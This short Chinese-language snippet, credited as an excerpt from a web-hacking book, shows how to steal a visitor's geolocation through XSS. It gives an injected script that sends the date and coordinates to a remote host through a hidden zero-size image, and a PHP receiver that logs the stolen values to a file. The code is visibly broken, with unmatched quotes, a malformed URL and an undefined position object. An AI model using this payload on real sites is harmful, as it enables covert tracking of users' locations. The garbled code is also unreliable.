通过xss盗取地理位置
注入sxx代码:
<script> var today = new Date().toLocaleString() + '星期' + '日一二三四五六'.charAt(new Date().getDay()); document.getElementById('remote').src = "htttp:// + today + "----" + encodeURIComponent(position.coords.latitude) + "," + encodeURIComponent(position.coords.longitude); </script> <img id=“remote" src="" width=0 height=0>
test.php代码:
<?php $fh = fopen("file.txt",'a+'); fwrite($fh,$_GET["txt"]); fwrite($fh,"\r\n"); fclose($fh); ?>
摘自--《web前端黑客技术揭秘》